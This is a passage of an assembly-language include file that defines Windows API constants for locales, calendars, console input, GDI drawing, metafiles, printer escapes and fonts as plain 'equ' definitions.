LOCALE_SABBREVMONTHNAME11 equ 4Eh
LOCALE_SABBREVMONTHNAME12 equ 4Fh
LOCALE_SABBREVMONTHNAME13 equ 100Fh
LOCALE_SPOSITIVESIGN equ 50h
LOCALE_SNEGATIVESIGN equ 51h
LOCALE_IPOSSIGNPOSN equ 52h
LOCALE_INEGSIGNPOSN equ 53h
LOCALE_IPOSSYMPRECEDES equ 54h
LOCALE_IPOSSEPBYSPACE equ 55h
LOCALE_INEGSYMPRECEDES equ 56h
LOCALE_INEGSEPBYSPACE equ 57h
TIME_NOMINUTESORSECONDS equ 1h
TIME_NOSECONDS equ 2h
TIME_NOTIMEMARKER equ 4h
TIME_FORCE24HOURFORMAT equ 8h
DATE_SHORTDATE equ 1h
DATE_LONGDATE equ 2h
TF_FORCEDRIVE equ 80h
LOCKFILE_FAIL_IMMEDIATELY equ 1h
LOCKFILE_EXCLUSIVE_LOCK equ 2h
LNOTIFY_OUTOFMEM equ 0
LNOTIFY_MOVE equ 1
LNOTIFY_DISCARD equ 2
SLE_ERROR equ 1h
SLE_MINORERROR equ 2h
SLE_WARNING equ 3h
SEM_FAILCRITICALERRORS equ 1h
SEM_NOGPFAULTERRORBOX equ 2h
SEM_NOOPENFILEERRORBOX equ 8000h
RT_CURSOR equ 1
RT_BITMAP equ 2
RT_ICON equ 3
RT_MENU equ 4
RT_DIALOG equ 5
RT_STRING equ 6
RT_FONTDIR equ 7
RT_FONT equ 8
RT_ACCELERATOR equ 9
RT_RCDATA equ 10
DFC_CAPTION equ 1
DFC_MENU equ 2
DFC_SCROLL equ 3
DFC_BUTTON equ 4
DFCS_CAPTIONCLOSE equ 0000h
DFCS_CAPTIONMIN equ 0001h
DFCS_CAPTIONMAX equ 0002h
DFCS_CAPTIONRESTORE equ 0003h
DFCS_CAPTIONHELP equ 0004h
DFCS_MENUARROW equ 0000h
DFCS_MENUCHECK equ 0001h
DFCS_MENUBULLET equ 0002h
DFCS_MENUARROWRIGHT equ 0004h
DFCS_SCROLLUP equ 0000h
DFCS_SCROLLDOWN equ 0001h
DFCS_SCROLLLEFT equ 0002h
DFCS_SCROLLRIGHT equ 0003h
DFCS_SCROLLCOMBOBOX equ 0005h
DFCS_SCROLLSIZEGRIP equ 0008h
DFCS_SCROLLSIZEGRIPRIGHT equ 0010h
DFCS_BUTTONCHECK equ 0000h
DFCS_BUTTONRADIOIMAGE equ 0001h
DFCS_BUTTONRADIOMASK equ 0002h
DFCS_BUTTONRADIO equ 0004h
DFCS_BUTTON3STATE equ 0008h
DFCS_BUTTONPUSH equ 0010h
DFCS_INACTIVE equ 0100h
DFCS_PUSHED equ 0200h
DFCS_CHECKED equ 0400h
DFCS_ADJUSTRECT equ 2000h
DFCS_FLAT equ 4000h
DFCS_MONO equ 8000h
DDD_RAW_TARGET_PATH equ 1h
DDD_REMOVE_DEFINITION equ 2h
DDD_EXACT_MATCH_ON_REMOVE equ 4h
MAX_PATH equ 32
MOVEFILE_REPLACE_EXISTING equ 1h
MOVEFILE_COPY_ALLOWED equ 2h
MOVEFILE_DELAY_UNTIL_REBOOT equ 4h
TokenUser equ 1
TokenGroups equ 2
TokenPrivileges equ 3
TokenOwner equ 4
TokenPrimaryGroup equ 5
TokenDefaultDacl equ 6
TokenSource equ 7
TokenType equ 8
TokenImpersonationLevel equ 9
TokenStatistics equ 10
GET_TAPE_MEDIA_INFORMATION equ 0
GET_TAPE_DRIVE_INFORMATION equ 1
SET_TAPE_MEDIA_INFORMATION equ 0
SET_TAPE_DRIVE_INFORMATION equ 1
FORMAT_MESSAGE_ALLOCATE_BUFFER equ 100h
FORMAT_MESSAGE_IGNORE_INSERTS equ 200h
FORMAT_MESSAGE_FROM_STRING equ 400h
FORMAT_MESSAGE_FROM_HMODULE equ 800h
FORMAT_MESSAGE_FROM_SYSTEM equ 1000h
FORMAT_MESSAGE_ARGUMENT_ARRAY equ 2000h
FORMAT_MESSAGE_MAX_WIDTH_MASK equ 0FFh
TLS_OUT_OF_INDEXES equ 0FFFFh
BACKUP_DATA equ 1h
BACKUP_EA_DATA equ 2h
BACKUP_SECURITY_DATA equ 3h
BACKUP_ALTERNATE_DATA equ 4h
BACKUP_LINK equ 5h
STREAM_MODIFIED_WHEN_READ equ 1h
STREAM_CONTAINS_SECURITY equ 2h
STARTF_USESHOWWINDOW equ 1h
STARTF_USESIZE equ 2h
STARTF_USEPOSITION equ 4h
STARTF_USECOUNTCHARS equ 8h
STARTF_USEFILLATTRIBUTE equ 10h
STARTF_RUNFULLSCREEN equ 20h
STARTF_FORCEONFEEDBACK equ 40h
STARTF_FORCEOFFFEEDBACK equ 80h
STARTF_USESTDHANDLES equ 100h
SHUTDOWN_NORETRY equ 1h
MAX_DEFAULTCHAR equ 2
CAL_ICALINTVALUE equ 1h
CAL_SCALNAME equ 2h
CAL_IYEAROFFSETRANGE equ 3h
CAL_SERASTRING equ 4h
CAL_SSHORTDATE equ 5h
CAL_SLONGDATE equ 6h
CAL_SDAYNAME1 equ 7h
CAL_SDAYNAME2 equ 8h
CAL_SDAYNAME3 equ 9h
CAL_SDAYNAME4 equ 0Ah
CAL_SDAYNAME5 equ 0Bh
CAL_SDAYNAME6 equ 0Ch
CAL_SDAYNAME7 equ 0Dh
CAL_SABBREVDAYNAME1 equ 0Eh
CAL_SABBREVDAYNAME2 equ 0Fh
CAL_SABBREVDAYNAME3 equ 10h
CAL_SABBREVDAYNAME4 equ 11h
CAL_SABBREVDAYNAME5 equ 12h
CAL_SABBREVDAYNAME6 equ 13h
CAL_SABBREVDAYNAME7 equ 14h
CAL_SMONTHNAME1 equ 15h
CAL_SMONTHNAME2 equ 16h
CAL_SMONTHNAME3 equ 17h
CAL_SMONTHNAME4 equ 18h
CAL_SMONTHNAME5 equ 19h
CAL_SMONTHNAME6 equ 1Ah
CAL_SMONTHNAME7 equ 1Bh
CAL_SMONTHNAME8 equ 1Ch
CAL_SMONTHNAME9 equ 1Dh
CAL_SMONTHNAME10 equ 1Eh
CAL_SMONTHNAME11 equ 1Fh
CAL_SMONTHNAME12 equ 20h
CAL_SMONTHNAME13 equ 21h
CAL_SABBREVMONTHNAME1 equ 22h
CAL_SABBREVMONTHNAME2 equ 23h
CAL_SABBREVMONTHNAME3 equ 24h
CAL_SABBREVMONTHNAME4 equ 25h
CAL_SABBREVMONTHNAME5 equ 26h
CAL_SABBREVMONTHNAME6 equ 27h
CAL_SABBREVMONTHNAME7 equ 28h
CAL_SABBREVMONTHNAME8 equ 29h
CAL_SABBREVMONTHNAME9 equ 2Ah
CAL_SABBREVMONTHNAME10 equ 2Bh
CAL_SABBREVMONTHNAME11 equ 2Ch
CAL_SABBREVMONTHNAME12 equ 2Dh
CAL_SABBREVMONTHNAME13 equ 2Eh
ENUM_ALL_CALENDARS equ 0FFFFh
CAL_GREGORIAN equ 1
CAL_GREGORIAN_US equ 2
CAL_JAPAN equ 3
CAL_TAIWAN equ 4
CAL_KOREA equ 5
RIGHT_ALT_PRESSED equ 1h
LEFT_ALT_PRESSED equ 2h
RIGHT_CTRL_PRESSED equ 4h
LEFT_CTRL_PRESSED equ 8h
SHIFT_PRESSED equ 10h
NUMLOCK_ON equ 20h
SCROLLLOCK_ON equ 40h
CAPSLOCK_ON equ 80h
ENHANCED_KEY equ 100h
FROM_LEFT_1ST_BUTTON_PRESSED equ 1h
RIGHTMOST_BUTTON_PRESSED equ 2h
FROM_LEFT_2ND_BUTTON_PRESSED equ 4h
FROM_LEFT_3RD_BUTTON_PRESSED equ 8h
FROM_LEFT_4TH_BUTTON_PRESSED equ 10h
MOUSE_MOVED equ 1h
DOUBLE_CLICK equ 2h
KEY_EVENT equ 1h
mouse_eventC equ 2h
WINDOW_BUFFER_SIZE_EVENT equ 4h
MENU_EVENT equ 8h
FOCUS_EVENT equ 10h
FOREGROUND_BLUE equ 1h
FOREGROUND_GREEN equ 2h
FOREGROUND_RED equ 4h
FOREGROUND_INTENSITY equ 8h
BACKGROUND_BLUE equ 10h
BACKGROUND_GREEN equ 20h
BACKGROUND_RED equ 40h
BACKGROUND_INTENSITY equ 80h
CTRL_C_EVENT equ 0
CTRL_BREAK_EVENT equ 1
CTRL_CLOSE_EVENT equ 2
CTRL_LOGOFF_EVENT equ 5
CTRL_SHUTDOWN_EVENT equ 6
ENABLE_PROCESSED_INPUT equ 1h
ENABLE_LINE_INPUT equ 2h
ENABLE_ECHO_INPUT equ 4h
ENABLE_WINDOW_INPUT equ 8h
ENABLE_MOUSE_INPUT equ 10h
ENABLE_PROCESSED_OUTPUT equ 1h
ENABLE_WRAP_AT_EOL_OUTPUT equ 2h
CONSOLE_TEXTMODE_BUFFER equ 1
R2_BLACK equ 1
R2_NOTMERGEPEN equ 2
R2_MASKNOTPEN equ 3
R2_NOTCOPYPEN equ 4
R2_MASKPENNOT equ 5
R2_NOT equ 6
R2_XORPEN equ 7
R2_NOTMASKPEN equ 8
R2_MASKPEN equ 9
R2_NOTXORPEN equ 10
R2_NOP equ 11
R2_MERGENOTPEN equ 12
R2_COPYPEN equ 13
R2_MERGEPENNOT equ 14
R2_MERGEPEN equ 15
R2_WHITE equ 16
R2_LAST equ 16
SRCCOPY equ 0CC0020h
SRCPAINT equ 0EE0086h
SRCAND equ 8800C6h
SRCINVERT equ 660046h
SRCERASE equ 440328h
NOTSRCCOPY equ 330008h
NOTSRCERASE equ 1100A6h
MERGECOPY equ 0C000CAh
MERGEPAINT equ 0BB0226h
PATCOPY equ 0F00021h
PATPAINT equ 0FB0A09h
PATINVERT equ 5A0049h
DSTINVERT equ 550009h
BLACKNESS equ 42h
WHITENESS equ 0FF0062h
GDI_ERROR equ 0FFFFh
HGDI_ERROR equ 0FFFFh
ERRORAPI equ 0
NULLREGION equ 1
SIMPLEREGION equ 2
COMPLEXREGION equ 3
RGN_AND equ 1
RGN_OR equ 2
RGN_XOR equ 3
RGN_DIFF equ 4
RGN_COPY equ 5
RGN_MIN equ RGN_AND
RGN_MAX equ RGN_COPY
BLACKONWHITE equ 1
WHITEONBLACK equ 2
COLORONCOLOR equ 3
HALFTONE equ 4
MAXSTRETCHBLTMODE equ 4
ALTERNATE equ 1
WINDING equ 2
POLYFILL_LAST equ 2
TA_NOUPDATECP equ 0
TA_UPDATECP equ 1
TA_LEFT equ 0
TA_RIGHT equ 2
TA_CENTER equ 6
TA_TOP equ 0
TA_BOTTOM equ 8
TA_BASELINE equ 24
TA_MASK equ TA_BASELINE+TA_CENTER+TA_UPDATECP
VTA_BASELINE equ TA_BASELINE
VTA_LEFT equ TA_BOTTOM
VTA_RIGHT equ TA_TOP
VTA_CENTER equ TA_CENTER
VTA_BOTTOM equ TA_RIGHT
VTA_TOP equ TA_LEFT
ETO_GRAYED equ 1
ETO_OPAQUE equ 2
ETO_CLIPPED equ 4
ASPECT_FILTERING equ 1h
DCB_RESET equ 1h
DCB_ACCUMULATE equ 2h
DCB_DIRTY equ DCB_ACCUMULATE
DCB_SET equ DCB_RESET|DCB_ACCUMULATE
DCB_ENABLE equ 4h
DCB_DISABLE equ 8h
META_SETBKCOLOR equ 201h
META_SETBKMODE equ 102h
META_SETMAPMODE equ 103h
META_SETROP2 equ 104h
META_SETRELABS equ 105h
META_SETPOLYFILLMODE equ 106h
META_SETSTRETCHBLTMODE equ 107h
META_SETTEXTCHAREXTRA equ 108h
META_SETTEXTCOLOR equ 209h
META_SETTEXTJUSTIFICATION equ 20Ah
META_SETWINDOWORG equ 20Bh
META_SETWINDOWEXT equ 20Ch
META_SETVIEWPORTORG equ 20Dh
META_SETVIEWPORTEXT equ 20Eh
META_OFFSETWINDOWORG equ 20Fh
META_SCALEWINDOWEXT equ 410h
META_OFFSETVIEWPORTORG equ 211h
META_SCALEVIEWPORTEXT equ 412h
META_LINETO equ 213h
META_MOVETO equ 214h
META_EXCLUDECLIPRECT equ 415h
META_INTERSECTCLIPRECT equ 416h
META_ARC equ 817h
META_ELLIPSE equ 418h
META_FLOODFILL equ 419h
META_PIE equ 81Ah
META_RECTANGLE equ 41Bh
META_ROUNDRECT equ 61Ch
META_PATBLT equ 61Dh
META_SAVEDC equ 1Eh
META_SETPIXEL equ 41Fh
META_OFFSETCLIPRGN equ 220h
META_TEXTOUT equ 521h
META_BITBLT equ 922h
META_STRETCHBLT equ 0B23h
META_POLYGON equ 324h
META_POLYLINE equ 325h
META_ESCAPE equ 626h
META_RESTOREDC equ 127h
META_FILLREGION equ 228h
META_FRAMEREGION equ 429h
META_INVERTREGION equ 12Ah
META_PAINTREGION equ 12Bh
META_SELECTCLIPREGION equ 12Ch
META_SELECTOBJECT equ 12Dh
META_SETTEXTALIGN equ 12Eh
META_CHORD equ 830h
META_SETMAPPERFLAGS equ 231h
META_EXTTEXTOUT equ 0A32h
META_SETDIBTODEV equ 0D33h
META_SELECTPALETTE equ 234h
META_REALIZEPALETTE equ 35h
META_ANIMATEPALETTE equ 436h
META_SETPALENTRIES equ 37h
META_POLYPOLYGON equ 538h
META_RESIZEPALETTE equ 139h
META_DIBBITBLT equ 940h
META_DIBSTRETCHBLT equ 0B41h
META_DIBCREATEPATTERNBRUSH equ 142h
META_STRETCHDIB equ 0F43h
META_EXTFLOODFILL equ 548h
META_DELETEOBJECT equ 1F0h
META_CREATEPALETTE equ 0F7h
META_CREATEPATTERNBRUSH equ 1F9h
META_CREATEPENINDIRECT equ 2FAh
META_CREATEFONTINDIRECT equ 2FBh
META_CREATEBRUSHINDIRECT equ 2FCh
META_CREATEREGION equ 6FFh
NEWFRAME equ 1
AbortDocC equ 2
NEXTBAND equ 3
SETCOLORTABLE equ 4
GETCOLORTABLE equ 5
FLUSHOUTPUT equ 6
DRAFTMODE equ 7
QUERYESCSUPPORT equ 8
SETABORTPROC equ 9
StartDocC equ 10
EndDocC equ 11
GETPHYSPAGESIZE equ 12
GETPRINTINGOFFSET equ 13
GETSCALINGFACTOR equ 14
MFCOMMENT equ 15
GETPENWIDTH equ 16
SETCOPYCOUNT equ 17
SELECTPAPERSOURCE equ 18
DEVICEDATA equ 19
PASSTHROUGH equ 19
GETTECHNOLGY equ 20
GETTECHNOLOGY equ 20
SETLINECAP equ 21
SETLINEJOIN equ 22
SetMiterLimitC equ 23
BANDINFO equ 24
DRAWPATTERNRECT equ 25
GETVECTORPENSIZE equ 26
GETVECTORBRUSHSIZE equ 27
ENABLEDUPLEX equ 28
GETSETPAPERBINS equ 29
GETSETPRINTORIENT equ 30
ENUMPAPERBINS equ 31
SETDIBSCALING equ 32
EPSPRINTING equ 33
ENUMPAPERMETRICS equ 34
GETSETPAPERMETRICS equ 35
POSTSCRIPT_DATA equ 37
POSTSCRIPT_IGNORE equ 38
MOUSETRAILS equ 39
GETDEVICEUNITS equ 42
GETEXTENDEDTEXTMETRICS equ 256
GETEXTENTTABLE equ 257
GETPAIRKERNTABLE equ 258
GETTRACKKERNTABLE equ 259
ExtTextOutC equ 512
GETFACENAME equ 513
DOWNLOADFACE equ 514
ENABLERELATIVEWIDTHS equ 768
ENABLEPAIRKERNING equ 769
SETKERNTRACK equ 770
SETALLJUSTVALUES equ 771
SETCHARSET equ 772
StretchBltC equ 2048
GETSETSCREENPARAMS equ 3072
BEGIN_PATH equ 4096
CLIP_TO_PATH equ 4097
END_PATH equ 4098
EXT_DEVICE_CAPS equ 4099
RESTORE_CTM equ 4100
SAVE_CTM equ 4101
SET_ARC_DIRECTION equ 4102
SET_BACKGROUND_COLOR equ 4103
SET_POLY_MODE equ 4104
SET_SCREEN_ANGLE equ 4105
SET_SPREAD equ 4106
TRANSFORM_CTM equ 4107
SET_CLIP_BOX equ 4108
SET_BOUNDS equ 4109
SET_MIRROR_MODE equ 4110
OPENCHANNEL equ 4110
DOWNLOADHEADER equ 4111
CLOSECHANNEL equ 4112
POSTSCRIPT_PASSTHROUGH equ 4115
ENCAPSULATED_POSTSCRIPT equ 4116
SP_NOTREPORTED equ 4000h
SP_ERROR equ -1
SP_APPABORT equ -2
SP_USERABORT equ -3
SP_OUTOFDISK equ -4
SP_OUTOFMEMORY equ -5
PR_JOBSTATUS equ 0h
OBJ_PEN equ 1
OBJ_BRUSH equ 2
OBJ_DC equ 3
OBJ_METADC equ 4
OBJ_PAL equ 5
OBJ_FONT equ 6
OBJ_BITMAP equ 7
OBJ_REGION equ 8
OBJ_METAFILE equ 9
OBJ_MEMDC equ 10
OBJ_EXTPEN equ 11
OBJ_ENHMETADC equ 12
OBJ_ENHMETAFILE equ 13
MWT_IDENTITY equ 1
MWT_LEFTMULTIPLY equ 2
MWT_RIGHTMULTIPLY equ 3
MWT_MIN equ MWT_IDENTITY
MWT_MAX equ MWT_RIGHTMULTIPLY
BI_RGB equ 0
BI_RLE8 equ 1
BI_RLE4 equ 2
BI_bitfields equ 3
NTM_REGULAR equ 40h
NTM_BOLD equ 20h
NTM_ITALIC equ 1h
TMPF_FIXED_PITCH equ 1h
TMPF_VECTOR equ 2h
TMPF_DEVICE equ 8h
TMPF_TRUETYPE equ 4h
LF_FACESIZE equ 32
LF_FULLFACESIZE equ 64
OUT_DEFAULT_PRECIS equ 0
OUT_STRING_PRECIS equ 1
OUT_CHARACTER_PRECIS equ 2
OUT_STROKE_PRECIS equ 3
OUT_TT_PRECIS equ 4
OUT_DEVICE_PRECIS equ 5
OUT_RASTER_PRECIS equ 6
OUT_TT_ONLY_PRECIS equ 7
OUT_OUTLINE_PRECIS equ 8
CLIP_DEFAULT_PRECIS equ 0
CLIP_CHARACTER_PRECIS equ 1
CLIP_STROKE_PRECIS equ 2
CLIP_MASK equ 0Fh
CLIP_LH_ANGLES equ 16
CLIP_TT_ALWAYS equ 32
CLIP_EMBEDDED equ 128
DEFAULT_QUALITY equ 0
DRAFT_QUALITY equ 1
PROOF_QUALITY equ 2
DEFAULT_PITCH equ 0
FIXED_PITCH equ 1
VARIABLE_PITCH equ 2
ANSI_CHARSET equ 0
DEFAULT_CHARSET equ 1
SYMBOL_CHARSET equ 2
SHIFTJIS_CHARSET equ 128
HANGEUL_CHARSET equ 129
CHINESEBIG5_CHARSET equ 136
OEM_CHARSET equ 255
FF_DONTCARE equ 0
FF_ROMAN equ 16
FF_SWISS equ 32
FF_MODERN equ 48
FF_SCRIPT equ 64
FF_DECORATIVE equ 80
FW_DONTCARE equ 0
FW_THIN equ 100
FW_EXTRALIGHT equ 200
FW_LIGHT equ 300
FW_NORMAL equ 400
FW_MEDIUM equ 500
FW_SEMIBOLD equ 600
FW_BOLD equ 700
FW_EXTRABOLD equ 800
FW_HEAVY equ 900
FW_ULTRALIGHT equ FW_EXTRALIGHT
FW_REGULAR equ FW_NORMAL
FW_DEMIBOLD equ FW_SEMIBOLD
FW_ULTRABOLD equ FW_EXTRABOLD
FW_BLACK equ FW_HEAVY
PANOSE_COUNT equ 10
PAN_FAMILYTYPE_INDEX equ 0
PAN_SERIFSTYLE_INDEX equ 1
PAN_WEIGHT_INDEX equ 2
PAN_PROPORTION_INDEX equ 3
PAN_CONTRAST_INDEX equ 4
PAN_STROKEVARIATION_INDEX equ 5
PAN_ARMSTYLE_INDEX equ 6
PAN_LETTERFORM_INDEX equ 7
PAN_MIDLINE_INDEX equ 8
PAN_XHEIGHT_INDEX equ 9
PAN_CULTURE_LATIN equ 0
PAN_ANY equ 0
PAN_NO_FIT equ 1
PAN_FAMILY_TEXT_DISPLAY equ 2
PAN_FAMILY_SCRIPT equ 3
PAN_FAMILY_DECORATIVE equ 4
PAN_FAMILY_PICTORIAL equ 5
PAN_SERIF_COVE equ 2
PAN_SERIF_OBTUSE_COVE equ 3
PAN_SERIF_SQUARE_COVE equ 4
PAN_SERIF_OBTUSE_SQUARE_COVE equ 5
PAN_SERIF_SQUARE equ 6
PAN_SERIF_THIN equ 7
PAN_SERIF_BONE equ 8
PAN_SERIF_EXAGGERATED equ 9
PAN_SERIF_TRIANGLE equ 10
PAN_SERIF_NORMAL_SANS equ 11
PAN_SERIF_OBTUSE_SANS equ 12
PAN_SERIF_PERP_SANS equ 13
PAN_SERIF_FLARED equ 14
PAN_SERIF_ROUNDED equ 15
PAN_WEIGHT_VERY_LIGHT equ 2
PAN_WEIGHT_LIGHT equ 3
PAN_WEIGHT_THIN equ 4
PAN_WEIGHT_BOOK equ 5
PAN_WEIGHT_MEDIUM equ 6
PAN_WEIGHT_DEMI equ 7
PAN_WEIGHT_BOLD equ 8
PAN_WEIGHT_HEAVY equ 9
PAN_WEIGHT_BLACK equ 10
PAN_WEIGHT_NORD equ 11
PAN_PROP_OLD_STYLE equ 2
PAN_PROP_MODERN equ 3
PAN_PROP_EVEN_WIDTH equ 4
PAN_PROP_EXPANDED equ 5
PAN_PROP_CONDENSED equ 6
PAN_PROP_VERY_EXPANDED equ 7
PAN_PROP_VERY_CONDENSED equ 8
PAN_PROP_MONOSPACED equ 9
PAN_CONTRAST_NONE equ 2
PAN_CONTRAST_VERY_LOW equ 3
PAN_CONTRAST_LOW equ 4
PAN_CONTRAST_MEDIUM_LOW equ 5
PAN_CONTRAST_MEDIUM equ 6
PAN_CONTRAST_MEDIUM_HIGH equ 7
PAN_CONTRAST_HIGH equ 8
PAN_CONTRAST_VERY_HIGH equ 9
PAN_STROKE_GRADUAL_DIAG equ 2
PAN_STROKE_GRADUAL_TRAN equ 3
PAN_STROKE_GRADUAL_VERT equ 4
PAN_STROKE_GRADUAL_HORZ equ 5
PAN_STROKE_RAPID_VERT equ 6
PAN_STROKE_RAPID_HORZ equ 7
PAN_STROKE_INSTANT_VERT equ 8
PAN_STRAIGHT_ARMS_HORZ equ 2
PAN_STRAIGHT_ARMS_WEDGE equ 3
PAN_STRAIGHT_ARMS_VERT equ 4
PAN_STRAIGHT_ARMS_SINGLE_SERIF equ 5
PAN_STRAIGHT_ARMS_DOUBLE_SERIF equ 6
PAN_BENT_ARMS_HORZ equ 7
PAN_BENT_ARMS_WEDGE equ 8
PAN_BENT_ARMS_VERT equ 9
PAN_BENT_ARMS_SINGLE_SERIF equ 10
PAN_BENT_ARMS_DOUBLE_SERIF equ 11
PAN_LETT_NORMAL_CONTACT equ 2
PAN_LETT_NORMAL_WEIGHTED equ 3
PAN_LETT_NORMAL_BOXED equ 4
PAN_LETT_NORMAL_FLATTENED equ 5
PAN_LETT_NORMAL_ROUNDED equ 6
PAN_LETT_NORMAL_OFF_CENTER equ 7
PAN_LETT_NORMAL_SQUARE equ 8
PAN_LETT_OBLIQUE_CONTACT equ 9
PAN_LETT_OBLIQUE_WEIGHTED equ 10
PAN_LETT_OBLIQUE_BOXED equ 11
PAN_LETT_OBLIQUE_FLATTENED equ 12
PAN_LETT_OBLIQUE_ROUNDED equ 13
PAN_LETT_OBLIQUE_OFF_CENTER equ 14
PAN_LETT_OBLIQUE_SQUARE equ 15
PAN_MIDLINE_STANDARD_TRIMMED equ 2
PAN_MIDLINE_STANDARD_POINTED equ 3
PAN_MIDLINE_STANDARD_SERIFED equ 4
PAN_MIDLINE_HIGH_TRIMMED equ 5
PAN_MIDLINE_HIGH_POINTED equ 6
PAN_MIDLINE_HIGH_SERIFED equ 7
PAN_MIDLINE_CONSTANT_TRIMMED equ 8
PAN_MIDLINE_CONSTANT_POINTED equ 9
PAN_MIDLINE_CONSTANT_SERIFED equ 10
PAN_MIDLINE_LOW_TRIMMED equ 11
PAN_MIDLINE_LOW_POINTED equ 12
PAN_MIDLINE_LOW_SERIFED equ 13
PAN_XHEIGHT_CONSTANT_SMALL equ 2
PAN_XHEIGHT_CONSTANT_STD equ 3
PAN_XHEIGHT_CONSTANT_LARGE equ 4
PAN_XHEIGHT_DUCKING_SMALL equ 5
PAN_XHEIGHT_DUCKING_STD equ 6
PAN_XHEIGHT_DUCKING_LARGE equ 7
ELF_VENDOR_SIZE equ 4
ELF_VERSION equ 0
ELF_CULTURE_LATIN equ 0
RASTER_FONTTYPE equ 1h
DEVICE_FONTTYPE equ 2h
TRUETYPE_FONTTYPE equ 4h
PC_RESERVED equ 1h
PC_EXPLICIT equ 2h
PC_NOCOLLAPSE equ 4h
TRANSPARENT equ 1
OPAQUE equ 2
BKMODE_LAST equ 2
GM_COMPATIBLE equ 1
GM_ADVANCED equ 2
GM_LAST equ 2
PT_CLOSEFIGURE equ 1h
PT_LINETO equ 2h
PT_BEZIERTO equ 4h
PT_MOVETO equ 6h
MM_TEXT equ 1
MM_LOMETRIC equ 2
MM_HIMETRIC equ 3
MM_LOENGLISH equ 4
MM_HIENGLISH equ 5
MM_TWIPS equ 6
MM_ISOTROPIC equ 7
MM_ANISOTROPIC equ 8
MM_MIN equ MM_TEXT
MM_MAX equ MM_ANISOTROPIC
MM_MAX_FIXEDSCALE equ MM_TWIPS
_ABSOLUTE equ 1
RELATIVE equ 2
WHITE_BRUSH equ 0
LTGRAY_BRUSH equ 1
GRAY_BRUSH equ 2
DKGRAY_BRUSH equ 3
BLACK_BRUSH equ 4
NULL_BRUSH equ 5
HOLLOW_BRUSH equ NULL_BRUSH
WHITE_PEN equ 6
BLACK_PEN equ 7
NULL_PEN equ 8
OEM_FIXED_FONT equ 10
ANSI_FIXED_FONT equ 11
ANSI_VAR_FONT equ 12
SYSTEM_FONT equ 13
DEVICE_DEFAULT_FONT equ 14
DEFAULT_PALETTE equ 15
SYSTEM_FIXED_FONT equ 16
STOCK_LAST equ 16
CLR_INVALID equ 0FFFFh
BS_SOLID equ 0
BS_NULL equ 1
BS_HOLLOW equ BS_NULL
BS_HATCHED equ 2
BS_PATTERN equ 3
BS_INDEXED equ 4
BS_DIBPATTERN equ 5
BS_DIBPATTERNPT equ 6
BS_PATTERN8X8 equ 7
BS_DIBPATTERN8X8 equ 8
HS_HORIZONTAL equ 0
HS_VERTICAL equ 1
HS_FDIAGONAL equ 2
HS_BDIAGONAL equ 3
HS_CROSS equ 4
HS_DIAGCROSS equ 5
HS_FDIAGONAL1 equ 6
HS_BDIAGONAL1 equ 7
HS_SOLID equ 8
HS_DENSE1 equ 9
HS_DENSE2 equ 10
HS_DENSE3 equ 11
HS_DENSE4 equ 12
HS_DENSE5 equ 13
HS_DENSE6 equ 14
HS_DENSE7 equ 15
HS_DENSE8 equ 16
HS_NOSHADE equ 17
HS_HALFTONE equ 18
HS_SOLIDCLR equ 19
HS_DITHEREDCLR equ 20
HS_SOLIDTEXTCLR equ 21
HS_DITHEREDTEXTCLR equ 22
HS_SOLIDBKCLR equ 23
HS_DITHEREDBKCLR equ 24
HS_API_MAX equ 25
PS_SOLID equ 0
PS_DASH equ 1
PS_DOT equ 2
PS_DASHDOT equ 3
PS_DASHDOTDOT equ 4
PS_NULL equ 5
PS_INSIDEFRAME equ 6
PS_USERSTYLE equ 7
PS_ALTERNATE equ 8
PS_STYLE_MASK equ 0Fh
PS_ENDCAP_ROUND equ 0h
PS_ENDCAP_SQUARE equ 100h
PS_ENDCAP_FLAT equ 200h
PS_ENDCAP_MASK equ 0F00h
PS_JOIN_ROUND equ 0h
PS_JOIN_BEVEL equ 1000h
PS_JOIN_MITER equ 2000h
PS_JOIN_MASK equ 0F000h
PS_COSMETIC equ 0h
PS_GEOMETRIC equ 10000h
PS_TYPE_MASK equ 0F0000h
AD_COUNTERCLOCKWISE equ 1
AD_CLOCKWISE equ 2
PRF_CHECKVISIBLE equ 00000001h
PRF_NONCLIENT equ 00000002h
PRF_CLIENT equ 00000004h
PRF_ERASEBKGND equ 00000008h
PRF_CHILDREN equ 00000010h
PRF_OWNED equ 00000020h
BDR_RAISEDOUTER equ 0001h
BDR_SUNKENOUTER equ 0002h
BDR_RAISEDINNER equ 0004h
BDR_SUNKENINNER equ 0008h
BDR_OUTER equ 0003h
BDR_INNER equ 000Ch
BDR_RAISED equ 0005h
BDR_SUNKEN equ 000Ah
EDGE_RAISED equ BDR_RAISEDOUTER|BDR_RAISEDINNER
EDGE_SUNKEN equ BDR_SUNKENOUTER|BDR_SUNKENINNER
EDGE_ETCHED equ BDR_SUNKENOUTER|BDR_RAISEDINNER
EDGE_BUMP equ BDR_RAISEDOUTER|BDR_SUNKENINNER
BF_LEFT equ 0001h
BF_TOP equ 0002h
BF_RIGHT equ 0004h
BF_BOTTOM equ 0008h
BF_TOPLEFT equ BF_TOP|BF_LEFT
BF_TOPRIGHT equ BF_TOP|BF_RIGHT
BF_BOTTOMLEFT equ BF_BOTTOM|BF_LEFT
BF_BOTTOMRIGHT equ BF_BOTTOM|BF_RIGHT
BF_RECT equ BF_LEFT|BF_TOP|BF_RIGHT|BF_BOTTOM
BF_DIAGONAL equ 0010h
BF_DIAGONAL_ENDTOPRIGHT equ BF_DIAGONAL|BF_TOP|BF_RIGHT
BF_DIAGONAL_ENDTOPLEFT equ BF_DIAGONAL|BF_TOP|BF_LEFT
BF_DIAGONAL_ENDBOTTOMLEFT equ BF_DIAGONAL|BF_BOTTOM|BF_LEFT
BF_DIAGONAL_ENDBOTTOMRIGHT equ BF_DIAGONAL|BF_BOTTOM|BF_RIGHT
BF_MIDDLE equ 0800h
BF_SOFT equ 1000h
BF_ADJUST equ 2000h
BF_FLAT equ 4000h
BF_MONO equ 8000h
DRIVERVERSION equ 0
TECHNOLOGY equ 2
HORZSIZE equ 4
VERTSIZE equ 6
HORZRES equ 8
VERTRES equ 10
BITSPIXEL equ 12
PLANES equ 14
NUMBRUSHES equ 16
NUMPENS equ 18
NUMMARKERS equ 20
NUMFONTS equ 22
NUMCOLORS equ 24
PDEVICESIZE equ 26
CURVECAPS equ 28
LINECAPS equ 30
POLYGONALCAPS equ 32
TEXTCAPS equ 34
CLIPCAPS equ 36
RASTERCAPS equ 38
ASPECTX equ 40
ASPECTY equ 42
ASPECTXY equ 44
LOGPIXELSX equ 88
LOGPIXELSY equ 90
SIZEPALETTE equ 104
NUMRESERVED equ 106
COLORRES equ 108
PHYSICALWIDTH equ 110
